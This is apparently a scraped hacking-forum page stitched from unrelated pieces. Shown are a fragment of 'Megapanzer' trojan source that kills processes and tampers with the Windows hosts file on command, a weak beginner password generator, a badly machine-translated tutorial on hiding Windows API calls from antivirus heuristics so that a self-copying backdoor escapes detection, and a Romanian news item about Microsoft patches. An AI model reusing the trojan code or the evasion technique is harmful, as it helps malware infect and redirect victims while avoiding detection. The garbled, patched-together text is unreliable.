*lCommandStructure = (PANZER_COMMAND *) pParameter; HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; DWORD dwPriorityClass; if (lCommandStructure->sCommandString != NULL) { if((hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE) { lRetVal = 1; goto END; } pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(hProcessSnap, &pe32)) { lRetVal = 2; goto END; } do { if(!strcmp(pe32.szExeFile, lCommandStructure->sCommandString)) { hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID); TerminateProcess(hProcess,0); CloseHandle(hProcess); } } while(Process32Next(hProcessSnap,&pe32)); } END: if (hProcessSnap != INVALID_HANDLE_VALUE) CloseHandle(hProcessSnap); return(lRetVal); } Modify hosts file Credit : carrumba #include <stdio.h> #include <windows.h> #include <Tlhelp32.h> #include "Megapanzer_Definitions.h" DWORD WINAPI addHostsEntry(PVOID pParameter) { int lRetVal = 0; int lFuncRetVal = 0; char lTemp[MAX_BUF_SIZE + 1]; char lTemp2[MAX_BUF_SIZE + 1]; char *lTempPointer = NULL; DWORD dwWritten = 0; HANDLE lFileHandle = INVALID_HANDLE_VALUE; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; if (lCommandStructure->sCommandString != NULL) { ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1, "\r\n%s", lCommandStructure->sCommandString); if ((lFileHandle = CreateFile(HOSTS_FILE, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) { SetFilePointer(lFileHandle,0,0,FILE_END); WriteFile(lFileHandle, lTemp, strlen(lTemp), &dwWritten, NULL); CloseHandle(lFileHandle); } } return(lRetVal); } DWORD WINAPI removeHostsEntry(PVOID pParameter) { int lRetVal = 1; int lFuncRetVal = 0; char lTemp[MAX_BUF_SIZE + 1]; char lReadBuffer[MAX_BUF_SIZE + 1]; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; FILE *lFileOldHostsHandle = NULL; FILE *lFileNewHostsHandle = NULL; if (lCommandStructure != NULL && lCommandStructure->sCommandString != NULL) { if ((lFileOldHostsHandle = fopen(HOSTS_FILE, "r")) != NULL) { ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE); if ((lFileNewHostsHandle = fopen(lTemp, "w")) != NULL) { while (!feof(lFileOldHostsHandle)) { ZeroMemory(lReadBuffer, sizeof(lReadBuffer)); if (fgets(lReadBuffer, sizeof(lReadBuffer) - 1, lFileOldHostsHandle) > 0) { if (strstr(lReadBuffer, lCommandStructure->sCommandString) == NULL) fprintf(lFileNewHostsHandle, lReadBuffer); else lRetVal = 0; } } fclose(lFileNewHostsHandle); } fclose(lFileOldHostsHandle); } } END: if (lRetVal == 0) { ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE); DeleteFile(HOSTS_FILE); MoveFile(lTemp, HOSTS_FILE); } return(lRetVal); } Very simple pass gen /* More simple pass generator; inspired by carb0n passgen code on this forum Lamecoded by : x.exexe_ // from newbie to newbies */ #include <iostream> #include <time.h> #include <fstream> void RndPass(int len, std::string &pesw) { // table with chars, can re-define char c_table[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9'}; srand(time(NULL)); for(; len > 0; len--) // save random number (as char) pesw += c_table[ rand()%(strlen(c_table)-1)]; // to pesw string } int main() { int len; std::string passwd = ""; std::cout << "\t\tSimply pesvrd gen by x.exexe_\n" << std::endl; std::cout << "Enter password lenght (number): "; std::cin >> len; RndPass(len,passwd); std::cout <<"Ur pass is : \n" << passwd << std::endl; std::cout << "Make internet better!" << std::endl; // create file stream with append mode std::ofstream PassFileStream("piss.txt", std::ios::app); if ( PassFileStream.is_open() ) // if stream open is ok ... PassFileStream << passwd << "\n\n"; // ... write pass to file PassFileStream.close(); // close stream std::cin.get(); // hit any key return 0; }

# Title: API crypting (Or: How to use the heuristic method of antivirus software austrickst) # Date: 03.03.2008 # Author: Eddy14 # Website: www.eddys-blog.6x.to # Email: eddy14@pen.tj # Contents: # # # 0x1 - Preface # # # 0x2 - Introduction # # # 0x3 - API commands # # # 0x4 - The source code (and explanation) # # # 0x5 - Deeper insight (Reverse Engineering) # # # 0x6 - Conclusion / Links _________________________ \ / \ / \ / \ / \ / 0x1 \ / \ / \ / \ / \ / \ / ######################### Preface # # ######################### Hello and welcome to my API crypting Tutorial:) I wanted this paper before 2.5 months have finished, but somehow my Dev-C + + strikes and I had otherwise no particular pleasure: P Gelabert Enough, I say unto you first what her background for this tutorial to bring should: -Good knowledge of C (pointers, Typecasting, etc.) Skills in Windows programming (The WinAPI!) -You should ever have worked with DLLs (important, otherwise you confuse the DLL -like code) -You should have ever encrypted strings (Caesarean encryption is sufficient) At the initiation gehts:) _________________________ \ / \ / \ / \ / \ / 0x2 \ / \ / \ / \ / \ / \ / ######################### Introduction # # ######################### Well, first: Why I write this tutorial? First, because too few tutorials I have written, and secondly, because I just They were joined by a remote shell for Windows to write (a little backdoor; btw => to the remote shell, so generally pipes under Windows, I will also be a tutorial write) and born2die together with've found that the antivirus software my backdoor was detected, and to me was what it was inexplicable, because it was self-written software that would have no signature should be fit! It was the stinkin heuristic! In my program was implemented something that was around this building: ------------------------- GetWindowsDirectory (& buffer, sizeof (buffer)); CopyFile (argv [0], buffer, FALSE); ------------------------- (intermediate or strcat to append the file name) What the Windows as much as said: ------------------------- Find your Windows directory published and copy me then! ------------------------- Antivir for what it looked like: ------------------------- Buuuh, I'm Bööööse and a virus! I am now totally leet itself into the Windows directory copy! ------------------------- what for me as much as said: ------------------------- Suck my balls! ------------------------- Well, joking aside. I had not long over, I knew that the antivirus GetWindowsDirectory the program and the subsequent CopyFile recognized as malware (do not know any other software that makes sense to use something, or maybe?). In any case the antivirus program detects my requests to this API, but not if they not exist in compiled state, but only after the run, very dynamic! Your asking how to do this? Well quite simply, we are not directly GetWindowsDirectory call (so that our program is not directly imported, and thus the AV of nothing bescheid white) but only when you run! It is very simple. You should format the PE (Portable Exectuable) a look. There you will at some point on the IAT (Import Address Table) encounter. This table includes addresses for the respective functions imported (foreign dlls). Based this table one can understand what API functions the program used. You may also during the life functions, the room in appear in this table (used, for example, if a DLL at runtime be). That said I do with "dynamic". (more on the IAT can be found here: http://sandsprite.com/CodeStuff/Understanding_imports.html) Your question is still how it works? Then read the first chapter "API commands," and in "source code" Part I will accurately explain everything:) _________________________ \ / \ / \ / \ / \ / 0x3 \ / \ / \ / \ / \ / \ / ######################### API commands # # ######################### First, the three "commands" we try to use: -GetWindowsDirectory (GetWindowsDirectoryA) CopyFile - -MessageBox (MessageBoxA) And the two major commands without the API crypting probably would not be possible: LoadLibrary - GetProcAddress - _________________________ \ / \ / \ / \ / \ / 0x4 \ / \ / \ / \ / \ / \ / ######################### # # The source code ######################### Since you now know what API calls we need, you will hopefully have can think what comes now. Or still not? Well, I vent the whole secret: We will present our views as strings encrypt, and then via LoadLibrary and GetProcAddress function call and invite. Sun can be found in the executable State of the executable file does not contain information about eg GetWindowsDirectory only via LoadLibrary and GetProcAddress. If these two functions do not say who would like to ask my Requirements through, because as it is written: You should schonmal a DLL loaded! Well, the secret is revealed! We certainly is not clear yet how the whole now operate. I will now perform code and of course as always, explain:) BTW, I use raw here GCC under Windows, Dev-C + + rum sucked, that's why. ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) ------------------------- Here you can see in advance what our test program to make. There is a so-called "crypt" Function of our test-string and then the printed output (+ waits for additional input). That is something everybody should have understood, because in principle, go here just about the "crypt" function which I now this show: ------------------------- int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- Sooo bad it looks or garnicht? Our loop goes through all the characters. With each pass, the current character read the given. Which is now the ASCII value [=> see "(int) str [length]"]. The ASCII value of "H" is 72nd The following is this added value is 1. Therefore, the value 73rd Now, in "chr" back to the ASCII character is stored, from 73rd What was done here is simple: it was encrypted! A sign was in the alphabet for a job after law postponed! It should therefore "I" arise, and it does too! So now with every other character to continue. Even with characters not in the alphabet are because it is yes to the ASCII table! Thus, a space with an exclamation mark, because the space is in the ASCII character table with the number 32, and the subsequent 33 is an exclamation point:) Now get even briefly thought about the Decrypt method. Well how is this most like? Well exactly, except that instead of subtracting, 1 adds. ------------------------- int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- Ready is our encryption method. You can string me from encrypt as you want, you can hauptsache decrypt it again. We now test our program: ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- For the readers of the GCC USEN (which will probably already know how you compiled: P): ------------------------- cryptme.c gcc-o cryptme.exe ------------------------- Starts it and what you see? There are ... ------------------------- Ifmmp! Xpsme Press any key. . . ------------------------- ... from. Our "Hello World" means encrypted (using our algorithm): ------------------------- Ifmmp! Xpsme ------------------------- OK good. Now everything runs ever. If you absolutely want to, you can also decrypt function test:) We will now make another try: O Replaced now that in the above "Hello World" with "MessageBoxA". It tells us: ------------------------- NfttbhfCpyB Press any key. . . ------------------------- As you probably suspected, we will for our attempts to encrypt MessageBox. Perhaps you ask why we MessageBoxA MessageBox and not encrypt? To be exact, there is no MessageBox. Windows is generally (any?) Function with strings works for 2 versions. One that ends with A and one that ends with W. Those with a question, the ASCII versions, and with W (for Wide Char) for the Unicode version. Depending on the setting of the compiler is a version of them selected. So you can either adjust the settings, or use the versions directly (instead of "MessageBox" So "MessageBoxA" in the code example). Ok, jump back on again we Topic (little English must be;)) If you ever have worked with DLLs (if not, then I urge you once again!) Then you probably know, the two functions LoadLibrary and GetProcAddress. These are We now use our encrypted features! Let go! (bit directly translated: P) ------------------------- int main (int argc, char * argv []) ( func_crypted char [] = "NfttbhfCpyB"; HMODULE dll; FARPROC MyMessageBox; decrypt (& func_crypted); dll = LoadLibrary ( "user32.dll"); MyMessageBox = GetProcAddress (dll, func_crypted); MyMessageBox (0, "In working dude;)", "yeaaah", MB_OK); system ( "PAUSE"); return 0; ) ------------------------- We declare "dll" and "MyMessageBox" for later use with LoadLibrary and GetProcAddress. Then we invite user32.dll (because there is our declared MessageBox, which you can find everything in the msdn look). Once we "dll" there, where we wanted it, we squeeze it in and say GetProcAddress him at the same time that the function to be loaded into "func_crypted" exists. You know from "NfttbhfCpyB" is well known "MessageBoxA" has become. So we say it is not more than: ------------------------- Loading from the user32.dll function MessageBoxA ------------------------- Then we finally have everything we want in MyMessageBox! We can now just call it as we MessageBox with it (or MessageBoxA) would have done. Alright dudes? =) In the case of GetWindowsDirectory was not much different, except that I kernel32.dll instead user32.dll download had:) So, now follows a chapter for all those interested in reverse engineering (ie cracking) know, for all do not go in this area, please skip, it was probably just confused! _________________________ \ / \ / \ / \ / \ / 0x5 \ / \ / \ / \ / \ / \ / ######################### Deeper insight # # ######################### So their leet cracker: P throws your Lieblingsdisassembler times (in my case OllyDBG). I will all the steps in this case with OllyDBG explain. Compiled try this source: ------------------------- # include <stdio.h> # include <windows.h> int main () ( Sleep (1000); MessageBox (0, "test", "test", MB_OK); return 0; ) ------------------------- It is useless, I know! But it is only for better understanding. As you can easily recognize the program waits for one second, then a MessageBox to display. This program we invite now Olly. CPU goes into the window (ie, the status of their results as soon as a program in Olly loads, expresses the safe side "C" at the top of the toolbar) and now makes a right click. Now it selects "Search for -> All inter-modular calls. Looks exactly as you order, there are not really much to read. At best it looks you in the area below the red line around. Here what you will discover: ------------------------- 00401321 | CALL <JMP.&KERNEL32.Sleep> | kernel32.Sleep 00401348 | CALL <JMP.&USER32.MessageBoxA> | USER32.MessageBoxA ------------------------- (The addresses may vary) You can see that 2 functions implemented (or otherwise: gecalled) are. Once our sleep, and once our MessageBox. That would be an antivirus program can recognize. For our encryption but you can not see! Since our program is' yes' to the start time (or before) does not know that he is equal to a function name and the corresponding decrypt function is! So, now it compiles times MessageBoxA our example and invites it in Olly. Your back is "Search for -> All inter-modular calls and lands back in the same window. Take a look back at the red line around, and it recognizes your API calls! LoadLibraryA, GetProcAddress, and system and a few others:) But hm, where is our MessageBoxA? Den gibts nicht! Since our program is at this time does not know! We go back to the CPU window (click on the "C" in the menu) and make a quick Clicking in the box below left, then right click and select "Search for -> binary string". First, we select "Entire block" and then jump in the ASCII range and type ... ------------------------- NfttbhfCpyB ------------------------- ... one. This is our Encrypted "MessageBoxA" if you should forget it. Olly And there was! You see, it was not detected a function call. Let's go a little further, it also means "insight". Thus we have a breakpoint on the string. Mark it, make a right click, go to "Point Break" and you see a small menu. We want to be a hardware breakpoint, but on "Access" or "Write"? If we make one in Access, then we would probably break if the string deciphered, and it is called (ie for GetProcAddress is used). Or we take "Write" and then immediately break when we start the string to decrypt. We take the latter;) And be a DWORD (for safety's sake). Once F9 and off you go! We break to: ------------------------- 0040131A A1 00304000 MOV EAX, DWORD PTR DS: [403000] 0040131F 8945 E8 MOV DWORD PTR SS: [EBP-18], EAX; <- HERE ------------------------- Hm, but what's in EAX? I can tell you! "7474664E" equivalent "ttfN" ie "Nftt" which means that the first 4 bytes from Crypteten string copied:) Now they are in EBP-18 is stored. That will be the "cache" or halt the "Endspeicher", where the decrypted "MessageBoxA" is stored. The whole Procedure with the copy line: ------------------------- 0040131A A1 00304000 MOV EAX, DWORD PTR DS: [403000] 0040131F 8945 E8 MOV DWORD PTR SS: [EBP-18], EAX; <- First copy 4 bytes 00401322 A1 04304000 MOV EAX, DWORD PTR DS: [403004] 00401327 8945 EC MOV DWORD PTR SS: [EBP-14], EAX; <- Next 4 bytes to copy 0040132A A1 08304000 MOV EAX, DWORD PTR DS: [403008] 0040132F 8945 F0 MOV DWORD PTR SS: [EBP-10], EAX; <- Next 4 bytes ... 00401332 8D45 E8 LEA EAX, DWORD PTR SS: [EBP-18] <- EAX is now in the address to string 00401335 890424 MOV DWORD PTR SS: [ESP], EAX; <- This is stored in ESP ------------------------- I wonder why the degree of the compiler has done so cumbersome, but maybe. Shortly hereafter follows a call! ------------------------- 00401338 E8 EB000000 CALL 00401428; <- Decrypt ------------------------- As my comment has already promised, here is decrypted! So once we trace pure, so that our F7 key also something to do:) ------------------------- 00401435 8B45 08 / -> MOV EAX, DWORD PTR SS: [EBP +8]; <- In the string load EAX 00401438 890424 | MOV DWORD PTR SS: [ESP], EAX; <- In ESP secure 0040143B E8 F0050000 | CALL <JMP.&msvcrt.strlen>; <- investigating the length of the string 00401440 3945 FC | CMP DWORD PTR SS: [EBP-4], EAX; <- All characters by? 00401443 73 2C | JNB SHORT 00401471; <- Then times jumping out of the loop! 00401445 8B45 08 | MOV EAX, DWORD PTR SS: [EBP +8]; <- The addresses to the string in EAX 00401448 0345 FC | ADD EAX, DWORD PTR SS: [EBP-4] <- The current character ... 0040144B 0FBE00 | MOVSX EAX, BYTE PTR DS: [EAX] <- EAX copy in ... 0040144E 8945 F4 | MOV DWORD PTR SS: [EBP-C], EAX; <- In EBP-C store 00401451 8D45 F4 | LEA EAX, DWORD PTR SS: [EBP-C] <- EAX In the address at the current character 00401454 FF08 | DEC DWORD PTR DS: [EAX] <- HERE! EAX decrease by one 00401456 8B45 F4 | MOV EAX, DWORD PTR SS: [EBP-C] <- EAX in the decoded symbol FB 00401459 8845 | MOV BYTE PTR SS: [EBP-5], AL; <- EBP-5 In the latest sign store 0040145C 8B45 08 | MOV EAX, DWORD PTR SS: [EBP +8] <- EAX has the address again to normal string 0040145F 8B55 FC | MOV EDX, DWORD PTR SS: [EBP-4] <- EDX is 0 00401462 01C2 | ADD EDX, EAX; <- EAX add EDX On 00401464 0FB645 FB | MOVZX EAX, BYTE PTR SS: [EBP-5] <- EAX is back in the decoded symbol 00401468 8802 | MOV BYTE PTR DS: [EDX], AL; <- Decrypts characters in the string will be changed 0040146A 8D45 FC | LEA EAX, DWORD PTR SS: [EBP-4]; <- Will increased (=> next character) 0040146D FF00 | INC DWORD PTR DS: [EAX] <- and hingeschrieben 0040146F EB ^ C4 \ - JMP SHORT 00401435; <- back to the beginning of loop ------------------------- Oh man! So much to read and understand! The comments should enhance the adventure, however;) In brief: All characters by one humiliate! Even shorter: Decrypt! But it is always nice to see what the compiler of our beautiful C code does not it? =) So, now we are setting a breakpoint after the JMP, allow the program to break, and now have our unencrypted "MessageBoxA" in memory lying ===) You do not believe me? Power for a short GOTO 0022FF60, owned, and the sight of you! : P Next in the code. So that our F8 key not schimmelt tippseln we bit on it since, so we also come with back out from the CALL. And we see what is exciting! Traced as little down time, after the Line with "% s", we see a "user32.dll", which looks very nice! And then there is a CALL to LoadLibraryA, and a little bit below make a GetProcAddress. Uhh have you also this tingling in the abdomen when everything is running perfectly? We turn times a breakpoint at the call to GetProcAddress because I have what you want to show! If Olly breaked look her in the stack. ------------------------- 0022FF20 7E360000 | 7E360000 = hModule (user32) 0022FF24 0022FF60 \ ProcNameOrOrdinal = "MessageBoxA" ------------------------- Just so much information at once! : O We recognize this HMODULE our of our code (as hex value in its natural form), and at the same time we recognize that we in the user32 and after "MessageBoxA". We step through this short time and then see CALL EAX into a miracle, our MessageBox was loaded! For me it is "7E3A058A," and when I look in the user32.dll would => It would agree;) You can convince yourself, right click the CPU window, "View -> Modules' user32 '' and now Right click "Goto -> Expression", the address, and schwupps, but it looks very much like a clean function, huh? OK, I think we have enough to getraced code, we have probably learned more (or not) as the Tutorial should provide. I hope part of you has fallen, if you've read through it ^ ^ _________________________ \ / \ / \ / \ / \ / 0x6 \ / \ / \ / \ / \ / \ / ######################### # Degree / Links # ######################### Pffft, then again from me:) The paper is unfortunately not as long as I have, I had hoped: / But I hope at least one which has learned from this tutorial:) This paper is released under the GNU Free Documentation License has been published So it is allowed to modify and distribute as you like, as long as my name on it still stands. Oh you know what, you can even get my name clear because the main people learn xD from this paper, so gehts doch;) So, as a sort of "annex" I have my whole source code here reinkopiert, have fun order, and to read again:) cryptme.c ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- mymessagebox.c ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( func_crypted char [] = "NfttbhfCpyB"; HMODULE dll; FARPROC MyMessageBox; decrypt (& func_crypted); dll = LoadLibrary ( "user32.dll"); MyMessageBox = GetProcAddress (dll, func_crypted); MyMessageBox (0, "In working dude;)", "yeaaah", MB_OK); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) -------------------------

Microsoft planuieste sa lanseze maine trei patch-uri de Alex Hanea | 9 martie 2009 Compania a anuntat inca de vineri ca pe 10 martie va pune la dispozitie trei actualizari de securitate, printre care una considerata critica, pentru Windows 2000, Server 2003, XP, Server 2008 si Windows Vista. Unul dintre patch-uri este catalogat de catre Microsoft ca fiind unul de nivel patru de alerta, mai exact “critic”. Daca este exploatata aceasta problema “critica”, poate permite atacatorilor sa preia controlul computerelor faca ca utilizatorii sa poata misca un deget. Celelalte doua patch-uri sunt clasificate ca fiind "importante", adica nivelul trei de risc, acestea remediind brese folosite de atacatori pentru a pacalii utilizatorii sa divulge informatii confidentiale. Desi compania nu a dezvaluit detalii despre vulnerabilitatile acoperite de patch-urile ce vor fi lansate maine, Microsoft a recunoscut totusi ca aceaste probleme "critice" reprezinta un risc pentru toate versiunile de Windows lansate pana acum, in timp ce unul dintre patch-urile considerate ca fiind “importante” nu afecteaza sistemele de operare XP sau Vista. Update-ul vine la mai putin de o saptamana dupa ce Microsoft a facut referire la un patch pentru o vulnerabilitate "critica", asemanatoare celei rezolvate in patch-ul de maine, dar de data aceasta in Excel. Office sau alte produse Microsoft nu vor fi “afectate” de aceasta operatiune declansata de compania americana.